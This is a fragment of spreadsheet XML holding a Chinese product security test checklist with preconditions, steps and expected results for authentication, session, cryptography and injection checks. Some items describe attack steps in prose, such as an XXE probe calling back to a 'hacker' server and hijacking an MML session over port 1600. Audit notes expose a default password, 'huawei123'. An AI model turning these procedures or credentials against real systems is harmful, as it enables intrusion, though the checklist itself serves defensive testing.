    <t>'006 禁止存在获取敏感信息的功能或接口</t>
  </si>
  <si>
    <t>'007 系统中不应存在开发/编译/调试/网络嗅探类工具或冗余安装文件</t>
  </si>
  <si>
    <t>'008 进行不安全操作时，应提示风险</t>
  </si>
  <si>
    <t>'009 日志级别的设置必须正确、合理</t>
  </si>
  <si>
    <t>'1、查看重要操作的日志级别，如：登录、修改密码、找回密码、支付等</t>
  </si>
  <si>
    <t>'001 已知exploit漏洞检查</t>
  </si>
  <si>
    <t>已安装drozer</t>
  </si>
  <si>
    <t>'4、所有漏洞都已经修复（标记为Exploit FIXED）。如果出现!Exploit EXSIST则表明漏洞没有被修复。</t>
  </si>
  <si>
    <t>'002 手机敏感APK是否有SQL注入风险</t>
  </si>
  <si>
    <t>'001 预共享密钥认证中的反射攻击防御</t>
  </si>
  <si>
    <t>'1、获取产品详细设计文档。</t>
  </si>
  <si>
    <t>'1、产品实现至少包含一种预防反射攻击的方法。</t>
  </si>
  <si>
    <t>'002 预共享密钥不直接用于加密与认证</t>
  </si>
  <si>
    <t>'1、预共享密钥仅用户加密密钥及认证密钥的生成，不直接用于加密和认证。</t>
  </si>
  <si>
    <t>'003 敏感数据加密密码提供密码管理或密钥协商机制</t>
  </si>
  <si>
    <t>'1.分析系统中所涉及的敏感数据范围及其涉及到传输的通道</t>
  </si>
  <si>
    <t>'1.加密密钥没有硬编码问题，有密钥管理和密钥协商的机制。</t>
  </si>
  <si>
    <t>'004 主密钥不直接用来加密敏感数据</t>
  </si>
  <si>
    <t>获取产品设计文档，并访谈相关设计人员。</t>
  </si>
  <si>
    <t>'1.访谈开发设计对加密的处理</t>
  </si>
  <si>
    <t>'005 根密钥与工作密钥的生成安全</t>
  </si>
  <si>
    <t>'006 根密钥与工作密钥的使用安全</t>
  </si>
  <si>
    <t>'007 系统中的密码都是加密存储</t>
  </si>
  <si>
    <t>'008 使用安全的随机数算法</t>
  </si>
  <si>
    <t>'1.获取系统的设计文档，检查相关内容。</t>
  </si>
  <si>
    <t>'1.系统使用到随机数函数为安全的函数。</t>
  </si>
  <si>
    <t>'009 替换伪随机函数</t>
  </si>
  <si>
    <t>使用伪随机函数</t>
  </si>
  <si>
    <t>利用工具如hping3 tool对调用随机函数的代码进行测试，检查是否足够随机。</t>
  </si>
  <si>
    <t>随机函数产生足够的随机性，无法预测。</t>
  </si>
  <si>
    <t>'010 RNG初始化漏洞</t>
  </si>
  <si>
    <t>能获取到源代码</t>
  </si>
  <si>
    <t>'011 高危操作、命令描述</t>
  </si>
  <si>
    <t>'012 绕过认证的隐秘通道</t>
  </si>
  <si>
    <t>'013 登陆认证的记住密码功能</t>
  </si>
  <si>
    <t>'1、系统运行正常</t>
  </si>
  <si>
    <t>'014 用户登陆过程中的提示安全</t>
  </si>
  <si>
    <t>'015 重要操作的重新认证</t>
  </si>
  <si>
    <t>'1、执行重启设备、格式化存储空间等危险操作时，需要对用户重新认证。</t>
  </si>
  <si>
    <t>'016 缓冲区溢出漏洞检查</t>
  </si>
  <si>
    <t>'017 SSH代码中存在非线程安全的函数</t>
  </si>
  <si>
    <t>代码中存在非线程安全的处理函数</t>
  </si>
  <si>
    <t>通过代码审计工具查找SSH代码中可能导致线程冲突的函数，如SSH2_Mac_Compute、kex_dh_hash等，增加线程安全的处理逻辑。</t>
  </si>
  <si>
    <t>所有的函数均是线程安全的</t>
  </si>
  <si>
    <t>'018 缓冲区溢出（堆溢出和栈溢出）</t>
  </si>
  <si>
    <t>程序中没有仔细检查用户输入的参数</t>
  </si>
  <si>
    <t>'1、通过逆向工程或代码审计检查接收用户输入的方法、函数等，写入超长度的内容，观察是否能够造成溢出。</t>
  </si>
  <si>
    <t>不存在缓冲区溢出</t>
  </si>
  <si>
    <t>'019 设备或应用系统应提供防篡改的特性</t>
  </si>
  <si>
    <t>设备或应用系统未提供防篡改的功能或未记录篡改事件。</t>
  </si>
  <si>
    <t>'1、检查设备或应用系统的设计文档，查看是否提供防篡改的功能特性或是否提供日志记录的功能记录篡改的事件。</t>
  </si>
  <si>
    <t>提供防篡改的功能特性或提供日志记录的功能。</t>
  </si>
  <si>
    <t>'020 安全函数的使用</t>
  </si>
  <si>
    <t>'1、获取产品源码</t>
  </si>
  <si>
    <t>'1、产品继承的代码已经将危险函数替换成安全函数；新增的代码全部使用安全函数。</t>
  </si>
  <si>
    <t>'021 安全编译的使用</t>
  </si>
  <si>
    <t>'1、获取产品的编译环境</t>
  </si>
  <si>
    <t>'1、产品编译过程中，开启了上述安全选项。</t>
  </si>
  <si>
    <t>'001 用户安全手机及邮箱任意修改漏洞</t>
  </si>
  <si>
    <t>'1.A用户登录安全手机和邮箱修改界面，修改USERid为B用户，构造A用户的手机或邮箱，B用户的userId发往服务器</t>
  </si>
  <si>
    <t>'1.修改失败，B用户的安全手机为B用户的手机</t>
  </si>
  <si>
    <t>'002 使用RSA算法进行加密操作时，应优先选择OAEP填充方式</t>
  </si>
  <si>
    <t>'003 AES_CBC_HEX_FILE模块使用随机生成密钥和随机IV的AES_CBC加密模式</t>
  </si>
  <si>
    <t>'1.加密使用随机生成密钥和安全随机算法</t>
  </si>
  <si>
    <t>'1.用户的个人数据和敏感数据要保存在应用程序目录并控制访问权限</t>
  </si>
  <si>
    <t>'007 头像本地加载模块对头像文件的大小和有效性进行判断</t>
  </si>
  <si>
    <t>'009 Rsync版本是安全的版本</t>
  </si>
  <si>
    <t>'1.查看Rsync版本信息</t>
  </si>
  <si>
    <t>'010 系统中要存在超级用户</t>
  </si>
  <si>
    <t>'013 已删除的用户的信息也要删除</t>
  </si>
  <si>
    <t>'002 系统禁止预留任何的未公开帐号，所有帐号都必须可被系统管理，并在产品CPI资料提供清晰的默认帐号和口令的清单</t>
  </si>
  <si>
    <t>'003 系统安装、初始化配置过程中使用到的临时帐号，在系统安装、初始化配置完成后，自动删除或者提供手工删除的指导书</t>
  </si>
  <si>
    <t>问题1（一般）：UUSYNC模块再同步数据的时候会循环内部创建临时ROOT账户，且密码和账户都是硬编码再模块中，虽然存在的时间很短，但是由于好似循环创建还是有机会被用户使用到。参看DTS2014073007497</t>
  </si>
  <si>
    <t>'002 系统禁止存在用户无法修改的口令。对于出厂时缺省设置的帐号/口令或用于传输的加密密钥，产品须提供客户修改机制，在产品CPI资料中应提醒用户修改及定期更新，并提示风险</t>
  </si>
  <si>
    <t>'003 面向最终用户/消费类的产品（如家庭以太网接入设备）打开远程登录的功能后，首次登录时系统须强制用户修改默认口令</t>
  </si>
  <si>
    <t>问题1（一般）：没有强制修改默认口令，设备应在用户首次登录时强制要求修改口令。</t>
  </si>
  <si>
    <t>'1、如果开启了远程登录功能，必须在首次登录时强制用户修改口令</t>
  </si>
  <si>
    <t>'004 系统存储口令时须加密。对口令进行单向哈希时，必须使用基于口令的密钥导出算法</t>
  </si>
  <si>
    <t>'005 在用户修改口令前，系统须提供验证旧口令以及对新口令再次确认的功能</t>
  </si>
  <si>
    <t>'006 系统禁止明文显示口令</t>
  </si>
  <si>
    <t>'007 系统禁止口令输入框拷出的功能</t>
  </si>
  <si>
    <t>'001 产品禁止提供导出华为预置证书私钥的接口。</t>
  </si>
  <si>
    <t>'002 产品应支持证书替换功能，并在产品资料中提示风险，建议客户替换成自己的证书和公私钥对</t>
  </si>
  <si>
    <t>'002 禁止存在绕过正常认证机制直接进入到系统的隐秘通道，如：组合键、鼠标特殊敲击、连接特定接口、使用特定客户端、使用特殊URL</t>
  </si>
  <si>
    <t>问题1（提示）：PC直连设备过在串口按R恢复密码huawei123，这样将会导致不安全的内部人员通过这样的方式进入系统来修改设备配置，建议业界通用做法，直接恢复默认出厂配置。</t>
  </si>
  <si>
    <t>'003 对用户的最终认证处理、鉴权处理过程必须在服务器端进行，并遵从先鉴权后执行的原则</t>
  </si>
  <si>
    <t>'004 正确使用SSH V2，且要禁用SSH的root帐号的远程登录功能</t>
  </si>
  <si>
    <t>'005 对于管理面人机登录的场景（如近端维护终端、网管维护终端、网管登录Portal、系统维护工具等），在登录界面禁止提供“自动登录/记住我”功能</t>
  </si>
  <si>
    <t>'001 管理面所有的用户的连接过程（登录成功、登录失败、登出）、系统对用户的锁定（包括自动锁定和管理员手动锁定）操作、系统对用户的解锁（包括自动解锁和管理员手动解锁）操作，均要记录日志，不得存在对特别用户进行特殊处理</t>
  </si>
  <si>
    <t>'001 应用系统中的用户不能增加自己的权限</t>
  </si>
  <si>
    <t>'002 新建帐号默认不授予任何权限或者默认只指派最小权限的角色</t>
  </si>
  <si>
    <t>'001 限制ftp/sftp用户向上跨目录访问，只能访问指定目录下的文件</t>
  </si>
  <si>
    <t>'002 包含敏感信息的文件（包括程序运行时产生的静态文件和临时文件）必须要有权限控制，只能被相应权限的用户访问</t>
  </si>
  <si>
    <t>'001 对于每一个需要授权访问的请求都必须核实用户是否被授权执行这个操作</t>
  </si>
  <si>
    <t>'001 会话标识必须使用安全随机数算法生成，且有效长度不低于24个字符（或192bits）</t>
  </si>
  <si>
    <t>'002 B/S 应用中，用户名和口令认证通过后，必须更换会话标识</t>
  </si>
  <si>
    <t>'003 会话标识需要进行安全传输</t>
  </si>
  <si>
    <t>问题1（一般）提交密码修改请求，密码、token、session_id在http协议下都是都是可见的，虽然密码都是加密后的密码，但由于新密码和确认密码只是使用前台的RSA算法来加密，只需要使用该算法替换掉原来请求中的新密码和确认密码，就能做到篡改。</t>
  </si>
  <si>
    <t>'004 B/S 应用中，必须使用cookie 用于维持会话</t>
  </si>
  <si>
    <t>问题1（致命）：在线用户的SessionID隐藏在页面中，操作员登录imana后，可轻易地获取到在线的管理员的SessionID。参看DTS2014091206206</t>
  </si>
  <si>
    <t>'005 必须使用会话Token对敏感或关键的操作进行校验，会话Token必须使用安全随机数算法生成、有效长度不低于24个字符（或192bits），且需要设置有效期</t>
  </si>
  <si>
    <t>'006 会话使用过程中，会话信息必须在服务器端存储和维护</t>
  </si>
  <si>
    <t>'007 服务器需要结合sessionid、IP地址以及其他的会话信息对每一个会话进行身份校验，判断该会话是否合法</t>
  </si>
  <si>
    <t>问题1（一般）：通过WEB请求业务请求过程中，URL携带有SESSION ID。</t>
  </si>
  <si>
    <t>'009 所有登录后才能访问的界面都必须提供主动退出选项，当用户退出时，服务器端必须清除该用户的会话信息</t>
  </si>
  <si>
    <t>'010 必须设置会话超时机制，在超时过后必须要清除该会话信息</t>
  </si>
  <si>
    <t>'001 软件安装包需要进行完整性保护并确保完整性校验流程安全可靠</t>
  </si>
  <si>
    <t>'002 使用来源可信的私钥对软件进行签名</t>
  </si>
  <si>
    <t>'003 必须严格保护用于软件完整性保护的根证书</t>
  </si>
  <si>
    <t>'004 在非信任网络之间进行敏感数据（包括口令，对称密钥，共享秘密，银行帐号，批量个人数据等）的传输须采用安全传输通道或者加密后传输，有标准协议规定除外</t>
  </si>
  <si>
    <t>'005 口令、密钥等敏感信息不允许明文存储在本地，应该加密保护；对敏感数据的访问要有认证、授权或加密机制。</t>
  </si>
  <si>
    <t>'006 禁止在URL、日志、错误消息、调试信息中暴露口令、密钥、银行账号、会话标识符等敏感信息</t>
  </si>
  <si>
    <t>'007 禁止存在获取敏感信息的功能或接口</t>
  </si>
  <si>
    <t>'008 应对操作系统、数据库进行加固</t>
  </si>
  <si>
    <t>'009 系统应确保系统服务做到默认安全，涉及默认安全的的安全参数应进行合理配置</t>
  </si>
  <si>
    <t>'1、对目标系纺是否进行安全配置</t>
  </si>
  <si>
    <t>'010 应做好三面隔离</t>
  </si>
  <si>
    <t>'011 不需要与公网进行交互的产品，禁止使用公网IP地址。如果设备内部通信确实需要公网IP，且能够保证外部对公网IP不可见，也不能将公网IP相关的路由扩散出设备，则可以例外</t>
  </si>
  <si>
    <t>'012 系统中不应存在开发/编译/调试/网络嗅探类工具或冗余安装文件</t>
  </si>
  <si>
    <t>'013 通信矩阵描述端口应与实际开放端口相符</t>
  </si>
  <si>
    <t>'014 进行不安全操作时，应提示风险</t>
  </si>
  <si>
    <t>'015 资料描述要全面正确，无遗漏/错误/不当描述</t>
  </si>
  <si>
    <t>'016 日志必须包括操作发生的时间、对象、结果、目的（可选）并可以追溯操作过程</t>
  </si>
  <si>
    <t>'017 日志写满之后的预警和处理流程以及删除、覆盖策略必须满足安全性要求</t>
  </si>
  <si>
    <t>'018 日志级别的设置必须正确、合理</t>
  </si>
  <si>
    <t>'019 安全相关的重要的业务操作必须记录日志</t>
  </si>
  <si>
    <t>'1.安全相关的重要的业务操作是否记录日志，重要业务包括但不限于：系统开启、关闭、业务升级、上传、下载、涉及用户个人数据操作等</t>
  </si>
  <si>
    <t>'020 移除不再使用的物理端口</t>
  </si>
  <si>
    <t>'001 OpenSSL协议版本过低，受到“心血”漏洞的影响</t>
  </si>
  <si>
    <t>公认的已知漏洞（心血漏洞）导致敏感信息泄露等安全问题，许多应用系统、第三方组件等使用了OpenSSL协议的低版本，应该提升到最新版本。</t>
  </si>
  <si>
    <t>'002 WebView漏洞检查</t>
  </si>
  <si>
    <t>'2、如果当前存在漏洞，将会在页面中输出存在漏洞的接口，比如显示：jsinterface</t>
  </si>
  <si>
    <t>'003 已知exploit漏洞检查</t>
  </si>
  <si>
    <t>'002 系统完整性校验</t>
  </si>
  <si>
    <t>产品软件包、补丁包、升级包可用；有产品相关资料说明文档。</t>
  </si>
  <si>
    <t>'003 通过修改配置文件或初始化文件来扩展功能</t>
  </si>
  <si>
    <t>应用程序运行正常</t>
  </si>
  <si>
    <t>系统会对文件进行完整性检查</t>
  </si>
  <si>
    <t>'004 预共享密钥不直接用于加密与认证</t>
  </si>
  <si>
    <t>'005 none认证方式检查</t>
  </si>
  <si>
    <t>'006 用户权限分配遵从责任分离原则</t>
  </si>
  <si>
    <t>系统用户权限管理采用“三权分立”原则</t>
  </si>
  <si>
    <t>'007 不能将权限直接指派到帐号</t>
  </si>
  <si>
    <t>被测系统正常，有账号管理功能</t>
  </si>
  <si>
    <t>'1.以系统管理员登录系统，访问系统的权限管理模块，尝试为某个帐号直接分配权限。</t>
  </si>
  <si>
    <t>'1.无法将权限直接分配给帐号。</t>
  </si>
  <si>
    <t>'008 指定帐号的有效时间</t>
  </si>
  <si>
    <t>'009 锁定不在有效时间内的帐号</t>
  </si>
  <si>
    <t>'010 帐号手工锁定功能</t>
  </si>
  <si>
    <t>检查应用程序是否提供人工帐号锁定功能，是否可以手工对操作员帐号和最终用户帐号（如果存在的话）进行锁定操作。</t>
  </si>
  <si>
    <t>应用程序提供人工帐号锁定功能，可以手工对操作员帐号和最终用户帐号（如果存在的话）进行锁定操作。</t>
  </si>
  <si>
    <t>'011 解锁帐号时需要重新设定有效时间</t>
  </si>
  <si>
    <t>'012 在线用户管理</t>
  </si>
  <si>
    <t>'013 在线用户数量限制</t>
  </si>
  <si>
    <t>'014 删除账号测试</t>
  </si>
  <si>
    <t>'015 超级管理员账号设计要求</t>
  </si>
  <si>
    <t>'016 服务器认证不能被客户端关闭</t>
  </si>
  <si>
    <t>Web服务正常或C/S应用正常</t>
  </si>
  <si>
    <t>'017 基于动态口令的双因素认证</t>
  </si>
  <si>
    <t>'1、基于动态口令的强认证模型应同时结合静态口令认证。</t>
  </si>
  <si>
    <t>'018 口令认证初次登陆强制修改密码</t>
  </si>
  <si>
    <t>web业务正常或命令行正常</t>
  </si>
  <si>
    <t>新用户登陆系统强制要求修改密码，并不能被绕过。</t>
  </si>
  <si>
    <t>'019 修改口令权限</t>
  </si>
  <si>
    <t>'1.不同级别的用户不用修改其他用户的密码。</t>
  </si>
  <si>
    <t>'020 口令有效期</t>
  </si>
  <si>
    <t>'021 口令明文回显</t>
  </si>
  <si>
    <t>'1、系统运行正常，且提供命令行操作界面。</t>
  </si>
  <si>
    <t>'1、输入场景、查看历史命令场景中，都查看不到明文的口令或密码。</t>
  </si>
  <si>
    <t>'022 “忘记密码”过程中的敏感信息安全</t>
  </si>
  <si>
    <t>'023 使用会话cookie维持会话</t>
  </si>
  <si>
    <t>'1.被测系统业务正常，用户访问特定业务。</t>
  </si>
  <si>
    <t>'024 MML会话被窃取</t>
  </si>
  <si>
    <t>关闭连接前未注销MML会话</t>
  </si>
  <si>
    <t>'1、查找已关闭的连接，利用脚本如python通过1600端口重新连接到MML控制台，进而重新使用之前的MML会话任意执行MML命令。</t>
  </si>
  <si>
    <t>MML会话在关闭连接前完全注销</t>
  </si>
  <si>
    <t>'025 会话标识应使用所有可用的字符集且大小写敏感</t>
  </si>
  <si>
    <t>'1、Web业务运行正常。</t>
  </si>
  <si>
    <t>sessionID大小写敏感，第4步返回sessionID无效，需要重新登陆。</t>
  </si>
  <si>
    <t>'026 检查IP地址规范</t>
  </si>
  <si>
    <t>'027 检查SNMP协议版本</t>
  </si>
  <si>
    <t>SNMP使用V3版本</t>
  </si>
  <si>
    <t>'028 SFTP访问路径控制</t>
  </si>
  <si>
    <t>SFTP程序运行正常</t>
  </si>
  <si>
    <t>'029 分配最小权限给运行程序的帐号</t>
  </si>
  <si>
    <t>'1.被测系统正常运行</t>
  </si>
  <si>
    <t>运行软件程序的帐号不是操作系统最高权限的帐号，不是超级管理员权限组成员，不具备超级管理员权限组的默认权限，且是一个分配最小权限（只分配了必须的权限）的操作系统帐号。</t>
  </si>
  <si>
    <t>'030 为目录和文件分配最小权限</t>
  </si>
  <si>
    <t>'031 安全编译的使用</t>
  </si>
  <si>
    <t>'032 安全函数的使用</t>
  </si>
  <si>
    <t>'033 SFTP协议用户权限测试</t>
  </si>
  <si>
    <t>系统开放了SFTP服务，且拥有SFTP账号密码。</t>
  </si>
  <si>
    <t>'034 程序权限控制</t>
  </si>
  <si>
    <t>'035 恢复默认配置测试</t>
  </si>
  <si>
    <t>'036 账号远程登陆权限控制</t>
  </si>
  <si>
    <t>'037 用户权限修改即时生效</t>
  </si>
  <si>
    <t>'1、系统运行正常。</t>
  </si>
  <si>
    <t>'1、用户权限修改即时生效，第3步操作不成功。</t>
  </si>
  <si>
    <t>'038 单用户文件夹或文件的权限控制</t>
  </si>
  <si>
    <t>'039 多用户文件夹或文件的权限控制</t>
  </si>
  <si>
    <t>'040 文件调用内容检查</t>
  </si>
  <si>
    <t>'041 不同的服务使用不同的账号运行</t>
  </si>
  <si>
    <t>'1.不同应用服务的应用账号各自不同。</t>
  </si>
  <si>
    <t>'042 系统启动菜单安全认证</t>
  </si>
  <si>
    <t>系统存在启动菜单并无认证密码</t>
  </si>
  <si>
    <t>需要密码方可进入启动菜单并且不存在隐藏子菜单。</t>
  </si>
  <si>
    <t>'043 设备或应用系统应提供防篡改的特性</t>
  </si>
  <si>
    <t>'044 及时清除过时的、低版本的第三方组件</t>
  </si>
  <si>
    <t>未及时清除不使用的、低版本的第三方组件。</t>
  </si>
  <si>
    <t>'045 补丁管理要求</t>
  </si>
  <si>
    <t>'046 内部接口访问</t>
  </si>
  <si>
    <t>'047 产品发布版本的补丁要求</t>
  </si>
  <si>
    <t>'048 禁用默认开启的服务</t>
  </si>
  <si>
    <t>设备或应用系统采用默认安装的方式安装了一些不需要的服务。</t>
  </si>
  <si>
    <t>'049 敏感数据加密密码提供密码管理或密钥协商机制</t>
  </si>
  <si>
    <t>'050 主密钥不直接用来加密敏感数据</t>
  </si>
  <si>
    <t>'051 禁止带有敏感数据的Web页面缓存</t>
  </si>
  <si>
    <t>'052 防止代理服务器强制缓存带有敏感数据的Web页面</t>
  </si>
  <si>
    <t>'053 根密钥与工作密钥的生成安全</t>
  </si>
  <si>
    <t>'054 根密钥与工作密钥的使用安全</t>
  </si>
  <si>
    <t>'055 系统中的密码都是加密存储</t>
  </si>
  <si>
    <t>'056 缺少特权账号使用默认密码的提示</t>
  </si>
  <si>
    <t>系统安装后赋予特权账号默认密码</t>
  </si>
  <si>
    <t>'1、检查使用系统前是否清晰提示特权账户正在使用默认密码，是否在配置教程等文档中清楚提示。</t>
  </si>
  <si>
    <t>使用系统前清晰提示特权账户正在使用默认密码，或是强制用户修改密码。</t>
  </si>
  <si>
    <t>'057 密钥自动更新</t>
  </si>
  <si>
    <t>'058 使用安全的随机数算法</t>
  </si>
  <si>
    <t>'059 替换伪随机函数</t>
  </si>
  <si>
    <t>'060 RNG初始化漏洞</t>
  </si>
  <si>
    <t>'061 安全告警</t>
  </si>
  <si>
    <t>系统记录违背安全策略的行为，如认证失败、鉴权失败、日志操作（包括转储、导出、删除等）、密钥过期等的告警信息。</t>
  </si>
  <si>
    <t>'062 高危操作、命令描述</t>
  </si>
  <si>
    <t>'063 日志访问权限要求</t>
  </si>
  <si>
    <t>'064 废弃的、过时的系统日志的实现</t>
  </si>
  <si>
    <t>应用系统使用BSD系统日志（RFC3164）</t>
  </si>
  <si>
    <t>'1、检查应用系统是否使用废弃的、过时的、不支持TLS/DTLS加密传输协议的BSD系统日志(RFC 3164)。</t>
  </si>
  <si>
    <t>使用支持TLS/DTLS加密传输协议的系统日志如RFC 6012等。</t>
  </si>
  <si>
    <t>'065 安全日志级别</t>
  </si>
  <si>
    <t>'1、安全日志级别相对较高，不会因级别低导致管理员容易忽略。</t>
  </si>
  <si>
    <t>'1、产品环境可用。</t>
  </si>
  <si>
    <t>'067 点击劫持</t>
  </si>
  <si>
    <t>'068 工具方式的敏感接口遍历</t>
  </si>
  <si>
    <t>'069 Robots方式的敏感接口查找</t>
  </si>
  <si>
    <t>'070 flash跨域配置</t>
  </si>
  <si>
    <t>'1.domain属性应根据最小化原则按需设置，仅允许可信任的来源跨域请求本域内容，例如</t>
  </si>
  <si>
    <t>'071 class文件反编译测试</t>
  </si>
  <si>
    <t>'1、测试用机上安装了jad.exe工具，假设安装在从c:\jad.exe</t>
  </si>
  <si>
    <t>不能得到源文件。</t>
  </si>
  <si>
    <t>'072 使用已知易受攻击的组件</t>
  </si>
  <si>
    <t>'073 DDOS攻击</t>
  </si>
  <si>
    <t>'074 认证绕过</t>
  </si>
  <si>
    <t>'075 客户端提交的未经审核的信息不能给会话信息赋值</t>
  </si>
  <si>
    <t>'076 注销功能漏洞</t>
  </si>
  <si>
    <t>服务正常，网络可到达。</t>
  </si>
  <si>
    <t>'077 在url中使用反斜杠转意编码</t>
  </si>
  <si>
    <t>'078 IP地址鉴权绕过</t>
  </si>
  <si>
    <t>系统运行正常，拥有用户登陆权限。</t>
  </si>
  <si>
    <t>'079 绕过认证的隐秘通道</t>
  </si>
  <si>
    <t>'080 登陆认证的记住密码功能</t>
  </si>
  <si>
    <t>'081 登陆ip地址限制</t>
  </si>
  <si>
    <t>'082 用户登陆过程中的提示安全</t>
  </si>
  <si>
    <t>'083 身份信息维护方式测试</t>
  </si>
  <si>
    <t>用户登陆后，身份信息不再由客户端提交，而是以服务器端会话信息中保存的身份信息为准。</t>
  </si>
  <si>
    <t>'084 防止业务资源滥用</t>
  </si>
  <si>
    <t>'1.有防止业务滥用的措施</t>
  </si>
  <si>
    <t>'085 禁用不安全的RSH远程连接</t>
  </si>
  <si>
    <t>应用系统启用RSH远程连接</t>
  </si>
  <si>
    <t>系统将用户踢出系统，相关资源全部释放。</t>
  </si>
  <si>
    <t>'087 暴力破解Web应用的认证</t>
  </si>
  <si>
    <t>'1.WEB应用程序存在用户注册、登陆功能，并采取了登陆验证机制。</t>
  </si>
  <si>
    <t>'1.暴力破解不成功。</t>
  </si>
  <si>
    <t>'088 重要操作的重新认证</t>
  </si>
  <si>
    <t>'089 检查cookie是否存在安全属性</t>
  </si>
  <si>
    <t>'1.cookie的安全属性设置正确</t>
  </si>
  <si>
    <t>'090 GET方式跨站脚本测试</t>
  </si>
  <si>
    <t>'092 Web权限提升漏洞</t>
  </si>
  <si>
    <t>执行失败</t>
  </si>
  <si>
    <t>'093 跨站请求伪造CSRF</t>
  </si>
  <si>
    <t>'094 跨站请求伪造CSRF检查</t>
  </si>
  <si>
    <t>web服务正常运行</t>
  </si>
  <si>
    <t>'095 XML注入</t>
  </si>
  <si>
    <t>'096 Cookie注入</t>
  </si>
  <si>
    <t>'097 SSI注入</t>
  </si>
  <si>
    <t>Web系统不存在SSI注入漏洞。</t>
  </si>
  <si>
    <t>'098 自动化工具SQL注入测试</t>
  </si>
  <si>
    <t>'099 SQL盲注</t>
  </si>
  <si>
    <t>存在SQL注入的URL</t>
  </si>
  <si>
    <t>加入盲注的测试脚本后无法执行sql脚本</t>
  </si>
  <si>
    <t>'100 备份文件下载</t>
  </si>
  <si>
    <t>'101 注释信息泄露</t>
  </si>
  <si>
    <t>'1.不存在敏感信息泄露</t>
  </si>
  <si>
    <t>'102 配置文件信息泄露</t>
  </si>
  <si>
    <t>'103 异常处理信息泄露</t>
  </si>
  <si>
    <t>'104 非法字符导致信息泄漏</t>
  </si>
  <si>
    <t>'105 robots文件信息泄露</t>
  </si>
  <si>
    <t>'106 HappyAxis.jsp页面测试</t>
  </si>
  <si>
    <t>'107 自动检查Web Service接口</t>
  </si>
  <si>
    <t>'108 数据库文件下载测试</t>
  </si>
  <si>
    <t>'109 数据库的运行账号</t>
  </si>
  <si>
    <t>'1.运行数据库需要使用单独的普通用户运行。</t>
  </si>
  <si>
    <t>'110 使用通用数据库的升级计划</t>
  </si>
  <si>
    <t>'111 数据库账户的权限控制</t>
  </si>
  <si>
    <t>'1.数据库帐户授予的权限进行严格清晰的划分，所有数据库帐户只能具备执行其任务的最小权限。</t>
  </si>
  <si>
    <t>'112 SYSDBA用户远程登录检查</t>
  </si>
  <si>
    <t>'1、步骤3、4检查结果都为NONE</t>
  </si>
  <si>
    <t>'113 数据库文件及用户数据文件的控制访问权限</t>
  </si>
  <si>
    <t>'1.只有数据库进程运行帐户以及管理员帐户才具备读写权限。</t>
  </si>
  <si>
    <t>'114 数据库的运行账号管理</t>
  </si>
  <si>
    <t>'115 不安全的维护工具</t>
  </si>
  <si>
    <t>应用系统存在维护系统的用户接口或工具。</t>
  </si>
  <si>
    <t>'116 不安全的测试应用</t>
  </si>
  <si>
    <t>应用系统存在可在线访问的测试Demo。</t>
  </si>
  <si>
    <t>没有连带部署有漏洞的测试、教学的应用程序。</t>
  </si>
  <si>
    <t>'117 TCP连接重置漏洞（CVE-2004-0230）</t>
  </si>
  <si>
    <t>系统一直保持着TCP连接并且存在此漏洞</t>
  </si>
  <si>
    <t>不存在此漏洞</t>
  </si>
  <si>
    <t>'118 Linux操作系统的shell裁剪</t>
  </si>
  <si>
    <t>'1、系统中不包含不使用的shell类型。非必要情况下建议只支持bash。</t>
  </si>
  <si>
    <t>'119 拒绝服务漏洞检查</t>
  </si>
  <si>
    <t>应用程序支持某通信协议，且处于正常运行状态。</t>
  </si>
  <si>
    <t>'120 缓冲区溢出漏洞检查</t>
  </si>
  <si>
    <t>'121 中间人攻击检查</t>
  </si>
  <si>
    <t>'122 TCP初始化序列号漏洞</t>
  </si>
  <si>
    <t>应用支持TCP连接，且处于正常运行状态。</t>
  </si>
  <si>
    <t>'123 不存在的URL</t>
  </si>
  <si>
    <t>'124 SSH压缩包解析漏洞</t>
  </si>
  <si>
    <t>'125 DOM型XSS检查</t>
  </si>
  <si>
    <t>'1.应用程序不存在DOM型XSS漏洞。</t>
  </si>
  <si>
    <t>'126 废弃SSH V1协议的支持</t>
  </si>
  <si>
    <t>系统已关闭SSH V1协议支持</t>
  </si>
  <si>
    <t>'127 SSH代码中存在非线程安全的函数</t>
  </si>
  <si>
    <t>'128 缓冲区溢出（堆溢出和栈溢出）</t>
  </si>
  <si>
    <t>'129 IPSec协议的防DOS攻击</t>
  </si>
  <si>
    <t>'1、系统IPSec新建速率保持稳定，或略有下降。</t>
  </si>
  <si>
    <t>'130 snmp认证密钥与加密密钥设置</t>
  </si>
  <si>
    <t>'1、各种方式均不允许snmp的认证密钥和加密密钥设置为相同的值。</t>
  </si>
  <si>
    <t>'131 协议超时机制检查</t>
  </si>
  <si>
    <t>'132 HTTP消息头注入检查</t>
  </si>
  <si>
    <t>'133 LDAP注入检查</t>
  </si>
  <si>
    <t>web应用程序支持LDAP查询服务</t>
  </si>
  <si>
    <t>'134 MML语法注入检查</t>
  </si>
  <si>
    <t>应用程序中存在MML接口</t>
  </si>
  <si>
    <t>'1.找出应用程序中提交给MML处理的参数，在输入参数的后面加入分号；提交请求，观察返回结果。</t>
  </si>
  <si>
    <t>'1.应用程序不存在MML注入漏洞。</t>
  </si>
  <si>
    <t>'135 SMTP注入检查</t>
  </si>
  <si>
    <t>应用程序支持SMTP协议</t>
  </si>
  <si>
    <t>'136 参数注入</t>
  </si>
  <si>
    <t>'137 CORBA SQL注入</t>
  </si>
  <si>
    <t>'138 RPC上线过程中的远程命令插入</t>
  </si>
  <si>
    <t>方法一：
尝试在输入框或导入系统的XML文件中包含语句：]&gt;。提交后，查看hacker服务器是否收到GET 1.html的HTTP请求。
方法二：
1、查找产品源码中是否有XML解析器，搜索documentbuilder和saxparser，或者xmlreader和org.w3c.dom.Document的引用。
2、如果有使用，确认被解析的语句或文档是否外部可控，是否有做数据检验。</t>
  </si>
  <si>
    <t>1.检查系统是否存在免费业务资源（如发送短信、彩信、邮件、打免费电话、好友推荐等）；
2.如果有，尝试频繁调用（比如，5分钟内使用超过100次）；如果存在“好友推荐”的功能，尝试篡改推荐的内容。</t>
  </si>
  <si>
    <t>1、 已知Web网站地址
2、 Web业务正常运行
3、 Web业务存在不同级别的权限（角色）</t>
  </si>
  <si>
    <t>1.WEB系统正常运行
2.系统提供不同的应用服务</t>
  </si>
  <si>
    <t>1、通过访谈或查看产品资料，看产品是否支持某些高危操作或命令，例如：某些性能调测命令、某些存储空间清理操作等。
2、看产品资料对高危操作或命令的应用场景是否描述清晰，并对可能造成的后果提示明确。
3、尝试使用高危操作或命令，看系统是否实时提示操作的危险性。</t>
  </si>
  <si>
    <t>1.系统正常运行
2.系统提供不同的应用服务</t>
  </si>
  <si>
